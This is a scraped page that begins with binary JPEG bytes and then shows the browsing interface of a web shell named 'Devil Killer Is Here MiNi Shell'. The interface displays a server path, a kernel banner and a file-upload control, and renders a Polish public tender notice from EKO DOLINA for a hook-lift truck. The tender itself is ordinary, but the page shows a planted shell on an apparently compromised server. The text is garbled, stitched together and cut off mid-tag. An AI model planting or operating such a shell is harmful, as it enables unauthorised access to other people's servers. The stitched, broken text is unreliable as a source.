JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20240705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20240705/0039888801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> (18A) Dostawa samochodu ciężarowego wraz z systemem hakowym </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;EKO DOLINA&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191680713</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Parku Krajobrazowego 99</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łężyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-207</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@ekodolina.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ekodolina.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> (18A) Dostawa samochodu ciężarowego wraz z systemem hakowym </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3731aad-3aa3-11ef-b37c-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00398888</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/950808 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/950808</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (dalej jako „Platforma”) pod adresem:<br/>https://platformazakupowa.pl/pn/ekodolina<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy i formularza „Wyślij wiadomość do zamawiającego”<br/>znajdującego się na stronie danego postępowania. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez kliknięcie przycisku „wyślij” po których pojawi się<br/>komunikat, że wiadomość została wysłana do Zamawiającego.<br/>3. Zamawiający z Wykonawcami będzie przekazywał informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany swz, zmiany terminu składania i otwarcia ofert zamawiający będzie zamieszczał na<br/>platformie w sekcji “Komunikaty”.<br/>4. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca będzie przekazywana w<br/>formie elektronicznej za pośrednictwem Platformy do tego konkretnego Wykonawcy.<br/>5. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC, spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>c) zainstalowana dowolna przeglądarka internetowa,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Reader DC, lub inny obsługujący format plików .pdf.<br/>6. Zalecane formaty przesyłanych danych, tj. pdf.<br/>Występuje limit objętości plików lub spakowanych folderów w zakresie całej oferty do ilości 10 plików lub spakowanych folderów<br/>(pliki można spakować dzieląc je na mniejsze paczki) przy maksymalnej wielkości 150 MB.<br/>7. Zalecany format kwalifikowanego podpisu elektronicznego:<br/>a) dokumenty w formacie .pdf zaleca się podpisywać formatem PAdES;<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż .pdf, wtedy zaleca się użyć formatu XadES, wtedy wymagany będzie<br/>oddzielny plik z podpisem.<br/>8. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy Zakupowej, określone w Regulaminie zamieszczonym na stronie internetowej pod adresem<br/>https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz uznaje go za wiążący.<br/>9. Zamawiający informuje, że instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, pobrania<br/>dokumentacji, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym<br/>postępowaniu przy użyciu Platformy Zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod<br/>adresem https://platformazakupowa.pl/strona/45-instrukcje<br/>Zamawiający dopuszcza format przesyłanych danych zgodnie z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012r. w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017r. poz. 2247.<br/>Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej<br/>konkurencji (t. j. Dz. U. 20201913), które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w<br/>osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa” a następnie wraz<br/>z plikami stanowiącymi jawną część skompresowane do jednego pliku archiwum (ZIP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">&#34;EKO DOLINA&#34; Sp. z o.o. przedkłada Państwu poniższe informacje: 1.Administratorem<br/>Pani/Pana danych osobowych jest &#34;EKO DOLINA&#34; Sp. z o.o., Aleja Parku Krajobrazowego 99, 84-207 Łężyce, NIP: 5881834882,<br/>REGON: 191680713, KRS: 0000030282. 2. Inspektorem Ochrony Danych Osobowych jest Pan Michał Filipowski.3. W sprawach<br/>związanych z przetwarzaniem danych osobowych, w szczególności dotyczących realizacji obowiązków Administratora danych<br/>osobowych oraz realizacji praw podmiotów danych osobowych należy kontaktować się z Administratorem danych osobowych<br/>kierując korespondencję na adres wskazany powyżej lub na adres e-mail: IOD@ekodolina.pl Pełna treść klauzuli informacyjnej<br/>RODO znajduje się w rozdz. XXXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZP-P/18A/2024/hakowiec</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedm. zamówienia jest dostawa fabr. nowego (tzn. wyprodukowanego nie wcześniej niż 6 m-cy przed datą zawarcia<br/>niniejszej umowy wskazanej na jej wstępie), nieużywanego, kompletnego, nieuszkodzonego samochodu ciężarowego wraz<br/>z systemem hakowym (dźwignikiem przemysłowym), przeznaczonego do eksploatacji na terenach budów, kopalniach żwiru<br/>i innych zastosowaniach przemysłowych, w trudnych warunkach terenowych. Samochód będzie przeznaczony do<br/>eksploatacji na terenie skład. odpadów komunalnych.<br/>Wymagania techniczne<br/>1. Samochód ciężarowy<br/>a) Silnik<br/>- rodzaj paliwa - olej napędowy<br/>- moc silnika nie mniejsza niż 300kW<br/>- silnik sześcio-cylindrowy, rzędowy, o pojemności min. 11000cm³<br/>- norma emisji spalin zgodna z wymaganą przepisami w dniu rejestracji pojazdu<br/>- maksymalny moment obrotowy nie mniejszy niż 2000 Nm<br/>- sprężarka powietrza dwu-cylindrowa<br/>- przystawka odbioru mocy napędzana od silnika z pompą o zmiennym wydatku<br/>- dodatkowy, odśrodkowy lub suchy filtr powietrza<br/>b) Podwozie<br/>- aluminiowy zbiornik paliwa o pojemności 250-400L wyposażony w płytę ochronną<br/>- zbiornik AdBlue o pojemności min. 40L<br/>- błotniki z tworzywa sztucznego<br/>- układ wydechowy z końcową rurą wyprowadzoną w górę, za kabiną<br/>- zderzak stalowy lub z narożnikami stalowymi, wyposażony w płytę ochronną<br/>- bez przedniej belki najazdowej<br/>- automatyczny sprzęg holowniczy z tyłu z dźwignią ręczną unoszoną do góry, przystosowany do ciągnięcia przyczep<br/>zgodnie z dopuszczalną masą zespołu pojazdów dla opisywanego pojazdu<br/>- nieregulowana, jedno-obwodowa pompa wspomagania układu kierowniczego<br/>- rozstaw pomiędzy osiami (pierwszą i drugą) nie więcej niż 4500mm<br/>- prześwit pod każdą osią, przy nie załadowanym samochodzie minimum 300mm<br/>- konfiguracja przeniesienia napędu 6 x 6 ze stałym napędem na wszystkie osie<br/>- blokada mechanizmu różnicowego<br/>- stabilizatory na każdej osi<br/>- dopuszczalna masa całkowita pojazdu nie mniejsza niż 26000kg<br/>- ładowność techniczna (dopuszczalne obciążenie samochodu poza drogami publicznymi) nie mniejsza niż 33000kg<br/>- resory przednie stalowe, wielopiórowe, paraboliczne<br/>- resory tylne stalowe, wielopiórowe, paraboliczne lub trapezowe<br/>c) Sprzęgło i skrzynia biegów<br/>- skrzynia biegów automatyczna z oprogramowaniem OFF ROAD<br/>- układ chłodzenia oleju przekładniowego<br/>- skrzynia rozdzielcza z przełożeniami terenowymi<br/>d) Układ hamulcowy i jezdny<br/>- hamulce bębnowe lub tarczowe na przedniej osi<br/>- hamulce bębnowe na osiach środkowej i tylnej<br/>- felgi stalowe, oś przednia 11,75x22,5, osie tylne 9,00x22,5<br/>- na osiach tylnych koła bliźniacze<br/>- opony szosowo terenowe (S+G) w rozmiarze, przód 385/65 R22,5 oraz tył 315/80 R22,5<br/>- hamulec silnikowy<br/>- czujnik wilgoci w układzie sprężonego powietrza<br/>- stalowy zbiornik sprężonego powietrza<br/>- przyłącze do napełniania sprężonym powietrzem umieszczone z przodu<br/>- osie na zwolnicach planetarnych<br/>e) Kabina<br/>- dzienna, dwu-osobowa, w kolorze białym, nie dopuszcza się kabiny sypialnianej<br/>- odległość przestrzeni mierzona od oparć foteli do tylnej ściany kabiny musi wynosić<br/>min. 25cm<br/>- tylna ściana wyposażona w okno<br/>- mechanizm przechylania kabiny mechaniczno-hydrauliczny (z olejem przystosowanym do pracy w temperaturach -25°C lub niższych)<br/>- pneumatyczny sygnał dźwiękowy<br/>- dwa kluczyki z pilotem, system zamków z zamkiem centralnym<br/>- lustra boczne ogrzewane z elektryczną regulacją<br/>- lustro rampowe<br/>- fotel kierowcy pneumatyczny, regulowany min. w trzech płaszczyznach<br/>- obicia foteli z tkaniny, z pokrowcami<br/>- po stronie kierowcy boczna roleta przeciwsłoneczna<br/>- podnośniki szyb po obu stronach elektryczne<br/>- komputer pokładowy<br/>- tachograf cyfrowy<br/>- radio z głośnikami<br/>- radio CB<br/>- automatyczny system ogrzewania i klimatyzacji z regulacją powietrzną<br/>- oświetlenie stopni wejściowych<br/>- tunel silnika z umieszczonym na nim schowkiem<br/>- dodatkowe gniazdo o napięciu 12V<br/>- poręcz na dachu, ułatwiająca wchodzenie na pojazd lub stopnie i uchwyty z tyłu kabiny<br/>- wahliwe najniższe stopnie do kabiny<br/>f) Elektronika/elektryka<br/>- dwa akumulatory (min. 210Ah) obok siebie<br/>- ogranicznik prędkości 90 km/h<br/>- dwa fabryczne światła ostrzegawcze na dachu kabiny, LED<br/>- boczne światła obrysowe<br/>- ledowe lub halogenowe światła do jazdy dziennej<br/>- reflektory przeciwmgielne<br/>- dodatkowe oświetlenie robocze zamontowane z tyłu kabiny i z tyłu pojazdu, LED<br/>- instalacja elektryczna 24V<br/>- sygnał dźwiękowy biegu wstecznego<br/>- główny wyłącznik prądu<br/>g) Pozostałe wyposażenie<br/>- trójkąt ostrzegawczy<br/>- lampa ostrzegawcza<br/>- gaśnica<br/>- podnośnik pojazdu teleskopowy o udźwigu min. 20T<br/>- dwa kliny pod koła<br/>- pistolet na sprężone powietrze z elastycznym przewodem<br/>- wąż do pompowania kół, z manometrem<br/>- kierownica po lewej stronie, pojazd do ruchu prawostronnego<br/>- kategoria pojazdu N3G, pojazd terenowy<br/>- jedno koło zapasowe w rozmiarze 315/80 R22,5 i jedno koło zapasowe w rozmiarze<br/>385/65 R22,5 (koła zapasowe nie muszą być zamontowane do podwozia)<br/>- klucz do kół<br/>2. Urządzenie hakowe<br/>- hak wymienny, przykręcany, wyposażony w blokadę grawitacyjną<br/>- automatyczna funkcja blokowania kontenera w funkcji wywrotu<br/>- wysokość haka 1570mm, zgodnie z normą DIN 30722<br/>- konstrukcja urządzenia hakowego w miejscach narażonych na największe obciążenia, czyli miejsce załamania ramienia<br/>haka, miejsce mocowania siłowników, miejsce mocowania tylnej rolki podporowej musi być wykonana z wykorzystaniem<br/>elementów odlewanych<br/>- maksymalnie dwie rolki prowadzące kontener podczas wykonywania operacji wciągania i zdejmowania<br/>- kontener podczas operacji wciągania i zdejmowania nie może mieć kontaktu z podporami stałymi<br/>- urządzenie musi być wyposażone w blokadę hydrauliczną zabezpieczającą przewożony kontener<br/>- urządzenie musi być wyposażone w układzie hydraulicznym w wagę mierzącą masę przewożonych kontenerów bez<br/>wymogu posiadania legalizacji Urzędu Miar i Wag<br/>- urządzenie musi być dostosowane do obsługi kontenerów o długości wewnętrznej od 4,7 do 6,9m<br/>- masa urządzenia razem ze zbiornikiem oleju i olejem nie może być większa niż 3200kg<br/>- ruch poziomy haka nie mniejszy niż 1420mm<br/>- chłodnica oleju hydraulicznego<br/>- dwa siłowniki wznoszące<br/>- ciśnienie robocze układu hydraulicznego nie większe niż 30MPa<br/>- udźwig minimalny 21000kg<br/>- urządzenie z funkcją tzw. miękkiego osiadania, eliminującą uderzenie kontenera podczas osiadania<br/>- funkcja pozwalająca na wykonanie całej sekwencji załadunku lub wyładunku kontenera, inicjowana po naciśnięciu jednego<br/>przycisku lub dźwigienki<br/>- alarm sygnalizujący o nie zapiętej blokadzie hydraulicznej kontenera lub system nie pozwalający na odjazd samochodem- układ elektroniczny uniemożliwiający wykonanie nieprawidłowego ruchu urządzeniem hakowym<br/>- hydrauliczna blokada resorów osi tylnej z informacją na pilocie sterującym<br/>- zasilanie z wielotłoczkowej pompy oleju hydraulicznego<br/>- urządzenie hakowe musi pochodzić z produkcji seryjnej<br/>- pilot sterowania hakiem wyposażony w wyświetlacz kodów błędów serwisowych w języku polskim lub piktogramów<br/>- zamontowana kamera do podglądu haka podczas manewru podczepiania kontenera<br/>3. Dodatkowe wymagania Zam.<br/>- dostawa samochodu do siedziby Zam. na koszt Wykonawcy, w czasie nie dłuższym niż 210 dni od dnia podpisania umowy<br/>- w okresie gwarancyjnym rozpoczęcie prac przez serwis Wykonawcy nastąpi maksymalnie w czasie 24h od chwili<br/>pisemnego zgłoszenia awarii (e-mail)<br/>- Wykonawca przeszkoli 6 osób w zakresie obsługi i eksploatacji samochodu oraz urządzenia hakowego w dniu dostawy,<br/>przed przeprowadzeniem próby eksploatacyjnej<br/>- samochód musi posiadać w dniu odbioru Dopuszczenie Jednostkowe lub homologację na pojazd skompletowany<br/>- zaświadczenie wystawione przez UDT w dniu odbioru z wykonanego badania UDT i decyzji o dopuszczeniu urządzenia do<br/>eksploatacji<br/>- w dniu dostawy Wykonawca przekaże Zam. komplet dokumentów pojazdu niezbędnych do rejestracji na terenie RP<br/>- Wykonawca dostarczy instrukcje obsługi samochodu i urządzenia hakowego, w języku polskim, w 3 egz., w wersji<br/>papierowej oraz w 3 egz., w wersji elektronicznej<br/>- Wykonawca dostarczy katalog części zamiennych samochodu i urządzenia hakowego<br/>w trzech egzemplarzach, w wersji elektronicznej<br/>- po zamontowaniu urządzenia hakowego Wykonawca dokona parametryzacji ograniczającej obroty silnika podczas pracy z<br/>przystawką do wartości podanych przez producenta urządzenia hakowego<br/>- wszystkie opisy na tabliczkach i na wyświetlaczach muszą być w języku polskim<br/>- okres gwarancyjny cało-pojazdowy, tzn. samochód, urządzenie hakowe i waga bez limitu kilometrów min. 24 m-ce<br/>- w cenie sprzedaży należy uwzględnić koszt wszystkich niezbędnych przeglądów okresowych przypadających w czasie<br/>trwania 24 miesięcznej gwarancji, dotyczących przeglądów samochodu i przeglądów urządzenia hakowego wraz z wagą<br/>- w przypadku udzielenia przez Wykonawcę dłuższej gwarancji niż wymagane min. 24 miesiące, przeglądy okresowe w tym<br/>podanym czasie Zam. będzie wykonywał na własny koszt<br/>- w trakcie użytkowania pojazdu, zarówno w trakcie trwania gwarancji jak i poza nią przeglądy zamontowanego urządzenia<br/>hakowego dokonywane przez inspektora UDT będą się odbywały na zgłoszenie i koszt Zam.<br/>4. Przeglądy okresowe w trakcie trwania gwarancji<br/>- dotyczące urządzenia hakowego wraz z zamontowaną na nim wagą będą wykonywane zgodnie z zapisami w DTR<br/>- dotyczące samochodu ciężarowego będą wykonywane zgodnie z dostarczoną dokumentacją DTR z tym, że Zam. wymaga<br/>aby Wykonawca uwzględnił specyficzną charakterystykę pracy polegającą na tym, iż w ciągu jednego, dwuzmianowego<br/>dnia pracy samochód hakowiec w Eko Dolinie pokonuje średnio dystans 25km, ale silnik pracuje średnio przez 15h.<br/>UWAGA:<br/>W czasie wykonywania umowy Wykonawca zobowiązany jest do przestrzegania przepisów BHP, ppoż. jak i regulaminów<br/>obowiązujących w miejscu spełnienia świadczenia m.in. wymogów związanych z systemem zarządzania środowiskowego<br/>PN-EN ISO 14001:2015, które są dostępne w biurze Zamawiającego na terenie jego zakładu.<br/>Zam. nie przewiduje zwrotu kosztów udziału w postępowaniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34142000-4 - Ciężarówki wyposażone w dźwig i pojazdy samowyładowcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">210 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena (C) – waga kryterium 100%;<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100%<br/><br/> cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 100%<br/> cena oferty ocenianej brutto<br/><br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>3. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span 